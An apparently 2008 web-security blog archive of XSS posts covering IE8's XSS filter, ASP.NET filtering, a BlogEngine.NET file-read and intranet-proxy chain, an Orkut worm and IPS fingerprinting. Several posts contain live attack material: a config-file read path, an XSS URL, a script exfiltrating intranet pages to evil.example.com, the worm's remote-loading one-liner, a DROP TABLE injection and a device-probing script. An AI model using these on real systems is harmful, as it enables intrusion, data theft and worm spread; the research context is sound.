web application security lab

Archive for the 'XSS' Category

XSSFilter Released

Wednesday, July 2nd, 2008

You may have already seen the news about the new XSSFilter in IE8.0, but I wanted to echo it here as well, because it’s a pretty major new release. It does a great job of preventing most of the reflected XSS attacks out there for users running the browser’s default settings once it hits production. Very cool stuff. By the way, the second link above also has a sneak peek at another security feature in IE8.0 if you look closely.

Think of XSSFilter like noscript in Firefox, but without the part that turns off JavaScript entirely, and unlike noscript it’s on by default in the browser, so it will impact a lot more people. David Ross (the guy who came up with the term Cross Site Scripting in the first place, btw) wrote this tool to start tackling a problem he’s been thinking about for eight or more years, ever since that paper was first authored. It’s not perfect, don’t get me wrong, but it’s a huge leap forward in the right direction, and I was hugely honored to be a part of it, since I think it will have a great positive impact on consumer security while we security knuckle-draggers figure out a way to get websites to start securing themselves.

Next on my wish list? Content restrictions!

ASP.NET 1.1 vs 2.0

Wednesday, April 23rd, 2008

My friend Michael Eddington did a very good write-up on the differences between ASP.NET 1.1 and 2.0 in terms of XSS protection. Surprisingly, it has actually gotten quite a bit worse between the two versions - so much so that event handlers are now wide open, directives are wide open, and style sheets are wide open. I haven’t tested this myself yet, but if Michael’s diagnosis is correct, that spells bad news for anyone who adopted the 2.0 filters to protect against XSS.

The funny part is that I actually thought the old ASP.NET filters were pretty good - not perfect, maybe, but good. Not only did they prevent most of the major classes of XSS vulns, but because of the heavy reliance on viewstates, they also made tampering with credentials via CSRF a far more difficult task, and in some cases entirely impossible. My question is: why would you intentionally make your filters worse? For the time being I’d stick to 1.1 if you use ASP.NET and are really concerned about XSS.

BlogEngine.NET Intranet Hacking

Saturday, April 12th, 2008

I ran across a really good example of the Intranet hacking through web pages that I was talking about a while back. Poking around in BlogEngine.NET, I found a handler that not only allows you to read files from the disk (including things like the web.config, the sql.config, and other sensitive files, with the syntax /js.axd?path=/web.config etc…), but that also discloses local websites with the syntax /js.axd?path=http://localhost/. Ouch.

To make matters worse, if I know someone is running this software internally and I don’t have direct access to it, I can use it to proxy requests through their intranet on my behalf, because there is a cross site scripting vulnerability in BlogEngine.NET with the syntax: search.aspx?q=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E.

So I would simply need to get a user that I knew belonged to a company running this software to click on a link. It would then force their browser back to the Intranet website running BlogEngine.NET, where the XSS would use XMLHttpRequest to pull in the js.axd file’s results, which would de facto allow me to read every site on their Intranet that wasn’t password protected, as well as enumerate the RFC1918 private address space. Ouch again.
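
To make the chain concrete, here’s a rough sketch (mine, not the actual exploit) of what the injected payload might look like - the intranet host and the collection URL are made up:

var xhr = new XMLHttpRequest();
// Ask the vulnerable handler to fetch an intranet page on the victim's behalf.
xhr.open('GET', '/js.axd?path=http://intranet-server/', true);
xhr.onreadystatechange = function () {
  if (xhr.readyState == 4) {
    // Ship whatever came back out to a hypothetical attacker-controlled logger.
    new Image().src = 'http://evil.example.com/log?d=' +
      encodeURIComponent(xhr.responseText.substring(0, 2000));
  }
};
xhr.send(null);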

When I first talked about this, a few people asked me if I had ever seen it in the wild. It took me a while to find something this widespread (probably 100,000 public installs), but this is probably the best working example I have seen. Google dork: BlogEngine.NET 1.3.0.0.

IE8.0 US-ASCII and Other Stuff

Monday, April 7th, 2008

David Ross had a good blog post a few weeks back about how IE8.0 is no longer vulnerable to the US-ASCII encoding attack. For those of you who don’t know what I’m talking about you can find an example of it on the charsets page. Looks like both of the browser manufacturers are stepping up their game a little for the next version of the browsers to hit the market.

On a side note, and something I’ve been meaning to post for a while now, I’ve found a discrepancy between IE and Firefox that I think is worth noting. Most of the time this isn’t an issue, because most web pages decode their inputs, so the fact that Firefox automatically URL-encodes every GET parameter is not a big deal. However, if the page doesn’t do any conversion and instead echoes the data back exactly as it was received, Firefox isn’t vulnerable but Internet Explorer is, because IE doesn’t convert characters like " into %22 before sending them.

It’s a subtle difference, and it only affects certain websites, but it was a big enough issue that I had to switch testing methods because Firefox wasn’t giving me the results I was expecting - even though I could see the vulnerability using a proxy. I don’t know what percentage of pages behave this way, but it will lead to a lot of false negatives in scanners that are looking for XSS injection if they follow the RFC. Net result for me? Firefox = less good for testing and IE = less secure.
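
To see the difference concretely, here’s a tiny sketch of roughly what the two browsers put on the wire for the same injected value, based on the behavior described above (the host and parameter name are made up):

var payload = '"><script>alert(1)</script>';

// Roughly what Firefox sends - the quote and angle brackets are escaped (%22, %3C, %3E),
// so a page that echoes the raw query string back never sees the literal characters:
var firefoxStyle = 'http://victim.example.com/page?q=' + encodeURIComponent(payload);

// Roughly what IE sends - the characters go out as-is, so the same page reflects
// them verbatim and the injection fires:
var ieStyle = 'http://victim.example.com/page?q=' + payload;

console.log(firefoxStyle);
console.log(ieStyle);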

Meanwhile, not that anyone cares, but it turns out that blogging is going to make me die an unfortunate and unglamorous early death. And here I always thought it was going to be due to an explosion. You people totally owe me. I expect payment in the afterlife.

Symbiotic Vs Parasitic Computing

Saturday, March 15th, 2008

Whelp, I just concluded my rather long trip to Boston for the first annual SourceBoston conference. I actually had a great time. There were a few bugs in the conference here and there, but that’s not unexpected for any first-time conference (totally forgivable). I expect it to grow quite a bit in the future given the quality of the talks I heard there. The talks were almost without exception technical or business oriented enough that I had a difficult time picking and choosing which ones I wanted to go to - so much so that this was the very first time I’ve ended up buying a talk after the conference was over. I’m glad I did, too. The telephone defenses talk by James Atkinson was excellent - long (2.25 hours) but excellent.

The keynotes were all great, but the one that really stood out in my mind was the talk by Dan Geer. It was a fast speech with a lot of specifics about the correlation between genetics/biology and viral/worm propagation. Later that evening a bunch of the more technical/business people were asked to go to a dinner with Polaris Ventures. There I got a chance to speak with Dan a little more and gently chastised him for not mentioning Samy, which I think intrigued him.

After the dinner, I began thinking about one concept that was mentioned during Dan’s talk and was echoed a number of times during the dinner and then again the next day. The concept was that in some networks we are seeing a shift from parasitic malicious software to symbiotic malicious software. That is, some of the best maintained machines are run by attackers: they are up to date, patched, the logs aren’t writing off the end of the disk, etc. Bad guys take a great deal of pride and care in their machines, trying to keep other hackers off the boxes, and they end up doing quite a bit of defense to ensure they retain the ability to maintain and control the box.

Okay, here’s where it gets really weird. Now let’s take that to its next logical, bizarre conclusion - often machines are healthier with an attacker on them than without. In fact, bad guys really do their best to make sure they aren’t saturating the connection or making the machine too slow; it’s in their best interest to have their control over the machine persist. It’s a strange malicious harmony, where the host is fed and nourished by the aggressor organism. But that only really makes sense when an attacker has access to the system and can control the inner workings of the computer itself. Are there any parallels between this and web application security?

I’ve thought about this quite a bit over the last few days and I can’t come up with a single real world instance where a malicious attack that doesn’t involve some level of OS compromise has been healthy for the host system in any way. Once you begin talking about remote file includes and command injection, it’s the same thing as a typical worm or virus scenario, where the attacker may spend a great deal of time and energy protecting the system, leaving only small back doors for themselves to recover control at will. But the compromises that don’t allow for any form of system/OS level control have only damaging effects. XSS worms, CSRF, SQL injection, etc. - none of them have any positive effects on the host system.

But each of those classes of vulnerabilities also shares one other thing: with the exception of persistent XSS/HTML injection or changes to the database, they have very little longevity compared to OS compromises. Adding an account to a database clearly can persist indefinitely, but more often than not a bad guy is less interested in adding to a database than in extracting information out of it, meaning the longevity is an afterthought. Persistent XSS that performs overtly malicious actions is typically uncovered quickly because of the real-time effects it tends to have against the normal user base.

With that in mind, it would appear that the less persistent the attack, the worse it is for the host system in terms of any tangible side benefits the attacker can bring to the table. There is little to no symbiosis in these forms of web application attacks. Now, clearly you’d say it’s better to have an XSS attack than a full computer compromise, and I’m not naive enough to think bad guys really care about the system; rather, their interest lies in maintaining control over their assets, which is a matter of economic loss aversion. But I definitely think there are some interesting side effects of malicious attacks here that are worth thinking through a little more.

Further, one rather interesting argument I’ve heard for protecting machines is increased OS longevity, which saves enterprises money by avoiding the productivity loss incurred when machine re-installs are required. This really becomes a problem when rampant spyware slows a machine down to the point where it is almost unusable, or even unstable because of the poor quality of the spyware code, forcing the owner to complain to their IT department. In that case it’s parasitic software. So perhaps what we are really interested in is stopping parasitic software and encouraging symbiotic software to lower IT costs. As long as the machine contains nothing sensitive, it would end up driving down support costs - assuming there were no other negative effects, like having your IP space black-holed for sending out too much spam. It sounds crazy, I know.

Jeremiah and I were talking about this with Dan from Polaris yesterday, though. If you could somehow use XSS as a way to do distributed computation for processor-intensive operations, you could potentially sell that to people who have high computational needs. I like that idea less than offering users a free download that uses a slice of their processor or bandwidth when the machine is idle (symbiotic), in trade for hardening the machine against purely malicious (parasitic) attackers. We’ve seen things like this in the past - SETI@home and the RC5 distributed cracking effort - but I consider both of those to be parasitic, offering little to nothing to the host machine. Interesting thought, anyway…

Orkut “Crush” Worm

Thursday, February 28th, 2008

I’m a little behind the times, catching up on my email, but I thought I’d post this first since it’s probably some of the most interesting stuff. Keyshor just sent me an interesting snippet related to another Orkut worm that I’m affectionately calling “Crush,” given its mode of transport: Orkut’s crush feature. Here’s Keyshor’s email (cleaned up slightly):

This is the vulnerable scrap

Find out who has crush on u….
wait 4 few minutes after pressing enter
Author–> Coder http://www.orkut.com/Profile.aspx?uid=12437994075478369725>:)
Just copy the JavaScript, paste it in your address bar and PRESS ENTER

*javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://002292.googlepages.com/crush.js';void(0)*

Trust me, ITS WORKING!!!

The site is down now, but I threw the JavaScript source up in the list of XSS worms so people could check it out. I was able to pull another version that was still alive here. Judging by the headers, it also appears that it may at one point have been a Greasemonkey plugin, which is an interesting way to debug your DHTML malware, I suppose. Anyway, it’s a great snippet for those who want to do some more analysis.
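
For anyone who doesn’t feel like squinting at that one-liner, here’s roughly what it does when pasted into the address bar (my annotations only - the actual worm logic lived in the remote crush.js):

javascript:
  d = document;                  // shorthand reference to the current page's document
  c = d.createElement('script'); // build a new script element inside that page
  d.body.appendChild(c);         // attach it to the DOM
  c.src = 'http://002292.googlepages.com/crush.js'; // setting src triggers the fetch, and
                                 // the worm code runs with the victim's Orkut session
  void(0);                       // evaluate to undefined so the browser doesn't navigate away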

Inline or Out of Bounds - Defeating Active Security Devices

Sunday, February 3rd, 2008

I’ve wrestled with the concept of inline devices to stop attacks for a long time. Disclaimer: no names of companies will be used in this post. There are legitimate reasons both for and against inline devices. Let’s look at the cons of inline security protection devices for a moment. The major cons of an inline device have to do with high availability and throughput. In many networks even a fraction of a second of delay is totally unacceptable. Packet loss is a non-starter too, so an inline device must be able to handle the throughput that the pipe can generate (potentially gig line speeds). Also, the device cannot create a single point of failure, which often requires double the hardware for inline deployments and makes out-of-line boxes potentially more cost effective (assuming the cost of the switch, span port, or tap isn’t too high). Those things combine to make a pretty complex solve if you are determined to have an inline device.

Now, the advantages of inline devices are that they can decrypt SSL traffic without requiring an extra external SSL accelerator, and that they can see everything and potentially block anything they detect as malicious. Let’s look at the difference in how an out of band IPS/WAF type device would have to work. Either it makes firewall rule entries by connecting to the firewall in front of the web application, or it uses the China-style method of injecting RST packets in one or both directions. Now, let’s dissect that scenario for a second.

For XSS this isn’t a terrible solution. RST packets in both directions mean that anyone duped into clicking a link won’t see the resultant malicious JavaScript returned to them. That’s great! Now let’s take SQL injection. There are two types of SQL injection that should be considered. The first is where I want to dump all the results from a database, or set my user account to something other than what it should be so that I get a different sort of auth cookie - both require something to be sent back to the attacker, and because HTTP is a noisy protocol it’s totally feasible that the device could block the response before it’s sent. The other is where I want to change a password or drop a table - where the attacker doesn’t need to get any result back. The same is true with remote file includes or command injection. In each of those cases it’s not necessarily important for the attacker to “see” the results from the same IP address they were attacking from. In fact, they could easily use different IPs, unrelated ports, different times of day, etc…
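
To illustrate why the response doesn’t matter for that second class, here’s a trivial “fire and forget” sketch - the endpoint and parameter are made up, and the point is only that nothing needs to come back for the damage to be done:

// A blind, state-changing injection where the attacker never reads the response.
var img = new Image();
// The request changes state on the server (think password change or DROP TABLE);
// a forged RST or a blocked response on the way back changes nothing.
img.src = 'http://victim.example.com/admin.aspx?id=1%27%3BDROP%20TABLE%20users--';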

So out of line security devices have a severe disadvantage when it comes to the latter injection attacks (which can often be far more dangerous than the former attacks that involve reflected results). Attackers have long known how to use different IP addresses when necessary, so I don’t see any reason why they couldn’t do so in this case to evade the device or firewall rule. Not to mention that firewall rules can often end up blocking lots of innocent people who happen to be behind the same NAT. So for my money, it looks like inline devices win that round - if throughput isn’t a major concern.

Further, there is another hidden problem here. Let’s say an attacker is unsure whether an active security device is in place (either inline or out of line - it doesn’t matter), but doesn’t want to get erroneous results when testing. All the attacker would have to do is intentionally send something they know should be blocked by any decent signature, and either listen for an RST packet (if it is a device that sends one to the client) or wait for nothing to be returned (if it is the kind that sends the RST packet to the server or outright blocks the connection). With a large enough sample of various default signatures, it’s possible to do actual versioning of the exact devices as well.

Enter the dawn of IPS/WAF fingerprinting. Code samples welcome.
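
Here’s a minimal sketch of the probing idea in Node-style JavaScript - everything in it is illustrative (the host, the probe string, the timeout), and a real tool would need a library of known default signatures to do the versioning part:

var net = require('net');

var host = 'target.example.com';  // hypothetical target
var probe = '/search?q=%3Cscript%3Ealert(1)%3C/script%3E';  // deliberately noisy payload

var sawData = false;
var sock = net.connect(80, host, function () {
  sock.write('GET ' + probe + ' HTTP/1.1\r\nHost: ' + host + '\r\nConnection: close\r\n\r\n');
});

sock.on('data', function () { sawData = true; });

sock.on('error', function (err) {
  if (err.code === 'ECONNRESET') {
    console.log('RST received - likely an active device resetting the client side');
  } else {
    console.log('Connection error: ' + err.code);
  }
});

sock.on('close', function () {
  if (!sawData) {
    console.log('No response at all - possibly reset server-side or dropped inline');
  } else {
    console.log('Got a response - no obvious filtering on this signature');
  }
});

sock.setTimeout(5000, function () {
  console.log('Timed out - the request may have been silently dropped');
  sock.destroy();
});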

Say Goodbye to IE6.0! Hello IE7.0!

Monday, January 21st, 2008

There’s an interesting article over on PC World about an update that Microsoft is pushing on Feb 12th: an automatic upgrade from IE6.0 to IE7.0. That’s right, folks… all you people who were writing exploits against IE6.0 will have little to no market share left. Here comes IE7.0. IE7.0 has a few significant improvements for XSS, but probably the most notable change beyond the user interface is the anti-phishing technology.

I can completely see why Microsoft is taking this approach - although I think people who aren’t used to IE7.0 will revolt until they get used to it. But think about it from the perspective of their biggest customers: they want their users to stop getting exploited. It’s bad for business, it’s bad for security and it’s bad for public relations. So for all of you who had come to know and love IE6.0, you might as well go download IE7.0 now and beat the curve. Resistance is futile! Although there are instructions on how to stop the upgrade if you really need to swim upstream.

Another MySpace XSS Through an API

Monday, January 21st, 2008

One of the things I love to talk about, when I’m ranting about how the same origin policy is improperly used to dictate how we as security professionals audit a website, is the use of APIs. Hackers don’t care that your browser sees them as different domains. If they can attack the API, and that API has access to the same data as the main website but without the controls in place to lock it down, so much the better. Anyway, all of this and much much more will be covered in the OWASP preso that I’m doing in Minnesota on Feb 11th, for those of you who live nearby. But let me return to my rant for a second.

I’ve seen lots of examples of this in the wild, but for various reasons I haven’t been able to talk about them specifically until now. Rosario Valotta found an XSS in MySpace using the mobile API. MySpace being plagued with XSS vulns is really nothing new, but this is actually pretty interesting to me because it’s the first time I can publicly point to a place where the API is the conduit for the attack. Where you’d normally be unable to enter JavaScript, on the mobile API the filters don’t exist. Good for bad guys, bad for consumers.

As Rosario pointed out, although this does end up on MySpace it wouldn’t make for a good worm, as the mobile platform doesn’t use the same credential as the website, so it would be impossible to propagate unless someone happened to be logged into the mobile platform when they visited an attacker’s malicious profile. Yes, folks, APIs need to be secured in the same way the website is. You are only as strong as the weakest link, and if you aren’t auditing those APIs you aren’t finding all your holes. Nice work by Rosario!

Diminutive Worm Contest Wrapup

Thursday, January 10th, 2008

While the fun is over, there is a lot to talk about in the wrap-up - so much so that I think it will take longer to deal with the output of the contest than the contest itself took. First of all, a huge congrats to both Giorgio Maone and Sirdarckcat for winning the contest with an incredibly small 161 byte worm. They tied because they both used nearly the same vector and it worked equally well. It was a tough battle and there were a lot of close calls, but various rules, cross browser compatibility and interoperability with Apache caused the pool of potential winners to be relatively small when the scoring was complete. That’s not to diminish anyone’s work, though - everyone did amazing work and I was very impressed when it all came together.

But now that leaves us with the aftermath. After looking at the contest for the first four days, we may have figured out a way to potentially stop worm propagation. Unlike tracking, this method may actually help companies devise plans to reduce the likelihood of worm propagation across their websites. This should put to rest the naysayers who thought nothing good could come of this contest. The paper is not for everyone - it’s pretty complex (as worms tend to be) - but I think the people who have the problem will understand how to use it in their own environments.

That said, there are at least two or three more potential outputs of this contest - including papers on propagation analytics, worm tracking technology, and potentially other things that I’m not privy to. Was it worth it? Absolutely. I couldn’t have been happier with the results. Thanks again to everyone who made it such a success. It was a lot of work, but it was the first step towards large scale worm defense. Again, a huge congrats to Giorgio Maone and Sirdarckcat!